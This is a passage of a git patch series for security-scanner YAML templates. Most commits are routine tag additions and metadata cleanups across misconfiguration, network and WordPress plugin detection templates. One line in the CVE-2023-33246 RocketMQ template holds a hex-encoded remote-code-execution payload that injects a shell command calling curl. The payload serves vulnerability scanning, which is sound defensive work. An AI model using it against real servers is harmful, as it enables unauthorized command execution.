100644 --- a/http/miscellaneous/aws-ecs-container-agent-tasks.yaml +++ b/http/miscellaneous/aws-ecs-container-agent-tasks.yaml @@ -7,7 +7,7 @@ info: description: Aws container metadata content reference: - https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect - tags: aws,docker,ec2 + tags: aws,docker,ec2,misc metadata: max-request: 2 diff --git a/http/miscellaneous/exposed-file-upload-form.yaml b/http/miscellaneous/exposed-file-upload-form.yaml index 8804f348b3..97fecb4d56 100644 --- a/http/miscellaneous/exposed-file-upload-form.yaml +++ b/http/miscellaneous/exposed-file-upload-form.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"multipart/form-data" html:"file" - tags: exposure,upload,form + tags: exposure,upload,form,misc http: - method: GET diff --git a/http/miscellaneous/microsoft-azure-error.yaml b/http/miscellaneous/microsoft-azure-error.yaml index bfe23a8709..d8cae54316 100644 --- a/http/miscellaneous/microsoft-azure-error.yaml +++ b/http/miscellaneous/microsoft-azure-error.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: title:"Microsoft Azure Web App - Error 404" - tags: error,azure,microsoft + tags: error,azure,microsoft,misc http: - method: GET diff --git a/http/miscellaneous/netflix-conductor-version.yaml b/http/miscellaneous/netflix-conductor-version.yaml index 4e2cca5e58..e040156aea 100644 --- a/http/miscellaneous/netflix-conductor-version.yaml +++ b/http/miscellaneous/netflix-conductor-version.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 2 shodan-query: http.title:"Conductor UI", http.title:"Workflow UI" - tags: tech,netflix,conductor,api + tags: tech,netflix,conductor,api,misc http: - method: GET From ff46d23cb094a722757525bb25d1669d49d3a51b Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:52:16 -0700 Subject: [PATCH 222/609] add misconfig tag to http/misconfiguration/ templates --- http/misconfiguration/dynamic-container-host.yaml | 2 +- http/misconfiguration/grav-register-admin.yaml | 2 +- http/misconfiguration/installer/spip-install.yaml | 2 +- http/misconfiguration/odoo-unprotected-database.yaml | 2 +- http/misconfiguration/symfony-fragment.yaml | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/http/misconfiguration/dynamic-container-host.yaml b/http/misconfiguration/dynamic-container-host.yaml index 0c15143040..9aa0efa2e5 100644 --- a/http/misconfiguration/dynamic-container-host.yaml +++ b/http/misconfiguration/dynamic-container-host.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dynamics Container Host" - tags: exposure,dynamic,container + tags: exposure,dynamic,container,misconfig http: - method: GET diff --git a/http/misconfiguration/grav-register-admin.yaml b/http/misconfiguration/grav-register-admin.yaml index 92f9f5007b..4d42d37375 100644 --- a/http/misconfiguration/grav-register-admin.yaml +++ b/http/misconfiguration/grav-register-admin.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Grav Register Admin User" - tags: grav,register,admin + tags: grav,register,admin,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/spip-install.yaml b/http/misconfiguration/installer/spip-install.yaml index 4c04ea72fe..c68f7bff74 100644 --- a/http/misconfiguration/installer/spip-install.yaml +++ b/http/misconfiguration/installer/spip-install.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 verified: "true" - tags: exposure,spip,install + tags: exposure,spip,install,misconfig http: - method: GET diff --git a/http/misconfiguration/odoo-unprotected-database.yaml b/http/misconfiguration/odoo-unprotected-database.yaml index 33b55d10e9..872f5eb82b 100644 --- a/http/misconfiguration/odoo-unprotected-database.yaml +++ b/http/misconfiguration/odoo-unprotected-database.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: title:"Odoo" - tags: odoo,database,unauth + tags: odoo,database,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/symfony-fragment.yaml b/http/misconfiguration/symfony-fragment.yaml index d1ea5c3e10..e68661ad72 100644 --- a/http/misconfiguration/symfony-fragment.yaml +++ b/http/misconfiguration/symfony-fragment.yaml @@ -15,7 +15,7 @@ info: max-request: 1 shodan-query: http.html:"symfony Profiler" verified: true - tags: config,exposure,symfony + tags: config,exposure,symfony,misconfig http: - method: GET From 43248088bfa996528cbba301b0427106150c07e9 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:53:55 -0700 Subject: [PATCH 223/609] add network tag to network/ templates --- network/cves/2023/CVE-2023-33246.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml index 2421314c7b..8bc5ecf4fb 100644 --- a/network/cves/2023/CVE-2023-33246.yaml +++ b/network/cves/2023/CVE-2023-33246.yaml @@ -21,7 +21,7 @@ info: max-request: 2 shodan-query: title:"RocketMQ" verified: true - tags: cve,cve2023,rocketmq,rce,oast,intrusive + tags: cve,cve2023,rocketmq,rce,oast,intrusive,network variables: part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}' From 3a4b625e3d49be61a9e9ecb47b4d9ecf21fe8f44 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 15:56:17 -0700 Subject: [PATCH 224/609] add detect tag to templates ending with -detect.yaml --- network/expn-mail-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/expn-mail-detect.yaml b/network/expn-mail-detect.yaml index 2d756a3a20..6b1525f20b 100644 --- a/network/expn-mail-detect.yaml +++ b/network/expn-mail-detect.yaml @@ -6,7 +6,7 @@ info: severity: info description: | The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information. - tags: mail,expn,network + tags: mail,expn,network,detect metadata: max-request: 2 From 3df9588b785dfdc0561569267f4d63923e0f5770 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 30 Jun 2023 16:26:39 -0700 Subject: [PATCH 225/609] syntax fixes --- http/misconfiguration/ibm-websphere-xml.yaml | 2 +- http/misconfiguration/proxy/metadata-aws.yaml | 1 - http/misconfiguration/springboot/springboot-heapdump.yaml | 1 - 3 files changed, 1 insertion(+), 3 deletions(-) diff --git a/http/misconfiguration/ibm-websphere-xml.yaml b/http/misconfiguration/ibm-websphere-xml.yaml index f57d8a4dfa..4ad719538b 100644 --- a/http/misconfiguration/ibm-websphere-xml.yaml +++ b/http/misconfiguration/ibm-websphere-xml.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true tags: ibm,websphere,exposure,misconfig - verified: "true" + verified: true http: - method: GET diff --git a/http/misconfiguration/proxy/metadata-aws.yaml b/http/misconfiguration/proxy/metadata-aws.yaml index f8fa2279c4..4778cd9862 100644 --- a/http/misconfiguration/proxy/metadata-aws.yaml +++ b/http/misconfiguration/proxy/metadata-aws.yaml @@ -28,7 +28,6 @@ info: tags: exposure,proxy,aws,amazon,misconfig,metadata metadata: max-request: 4 - tags: exposure,proxy,aws,amazon,misconfig,metadata http: - raw: diff --git a/http/misconfiguration/springboot/springboot-heapdump.yaml b/http/misconfiguration/springboot/springboot-heapdump.yaml index 5828c791ff..e17e449dc0 100644 --- a/http/misconfiguration/springboot/springboot-heapdump.yaml +++ b/http/misconfiguration/springboot/springboot-heapdump.yaml @@ -8,7 +8,6 @@ info: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests. reference: - https://github.com/pyn3rd/Spring-Boot-Vulnerability - tags: springboot,exposure,misconfig metadata: max-request: 3 tags: springboot,exposure,misconfig From 33cf9eadcc0d5e604ced2b9066550df96d96d9c2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 04:02:08 +0000 Subject: [PATCH 226/609] Auto WordPress Plugins Update [Sat Jul 1 04:02:08 UTC 2023] :robot: --- helpers/wordpress/plugins/iwp-client.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cloudflare.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - http/technologies/wordpress/plugins/easy-google-fonts.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-and-footer-scripts.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - http/technologies/wordpress/plugins/photo-gallery.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 201 files changed, 1 insertion(+), 201 deletions(-) diff --git a/helpers/wordpress/plugins/iwp-client.txt b/helpers/wordpress/plugins/iwp-client.txt index 6f165bc1b0..c56eaaaf45 100644 --- a/helpers/wordpress/plugins/iwp-client.txt +++ b/helpers/wordpress/plugins/iwp-client.txt @@ -1 +1 @@ -1.12.1 \ No newline at end of file +1.12.3 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 